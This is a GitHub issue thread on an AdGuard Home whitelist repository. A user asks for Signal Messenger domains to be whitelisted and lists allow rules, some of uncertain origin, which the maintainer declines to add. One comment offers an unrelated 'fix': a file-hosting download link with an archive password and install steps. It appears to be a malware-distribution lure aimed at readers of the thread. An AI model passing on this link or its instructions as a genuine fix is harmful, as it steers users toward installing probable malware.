### ISSUE TITLE
Add Signal Messenger

### ISSUE THREAD

**Issue by Clyde6790pGIT** [hl2guide/AdGuard-Home-Whitelist#12]
### Checklist

- [X] This is not a **[duplicate](https://github.com/hl2guide/AdGuard-Home-Whitelist/issues)** of an existing issue.

### Description

Attempting to open Signal does not work

### Expected behaviour

Signal works properly

### Current behaviour

Signal does NOT launch

### Possible reason/solution

By adding this to the whitelist, it now works correctly.
@@|ud-chat.signal.org^$important
@@|chat.signal.org^$important
@@|storage.signal.org^$important
@@|signal.org^$important
@@|www.signal.org^$important
@@|updates2.signal.org^$important
@@|textsecure-service-whispersystems.org^$important
@@|giphy-proxy-production.whispersystems.org^$important
@@|cdn.signal.org^$important
@@|whispersystems-textsecure-attachments.s3-accelerate.amazonaws.com^$important
@@|d83eunklitikj.cloudfront.net^$important
@@|souqcdn.com^$important
@@|cms.souqcdn.com^$important
@@|api.directory.signal.org^$important
@@|contentproxy.signal.org^$important
@@|turn1.whispersystems.org^$important

**Comment by hl2guide** [comment]
Thanks for reporting this @Clyde6790pGIT .

Could you please advise what these below rules are for?

```
@@|d83eunklitikj.cloudfront.net|^$important
@@|souqcdn.com|^$important
@@|cms.souqcdn.com|^$important
```

**Comment by Clyde6790pGIT** [comment]
I'm not sure either, but I found these domains on a community edited list for PiHole, it was confirmed that it worked correctly with these whitelisted.
https://discourse.pi-hole.net/t/commonly-whitelisted-domains/212

**Comment by hl2guide** [comment]
okay I don't use Signal so I'll test these out and after review may add them by the end of September.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Clyde6790pGIT** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

What?

**Comment by Clyde6790pGIT** [comment]
Hi, be reminded that the formatting was wrong, and I have now corrected it.

**Comment by hl2guide** [comment]
I've decided to avoid adding these rule for the moment. I may review it again a few months from now.
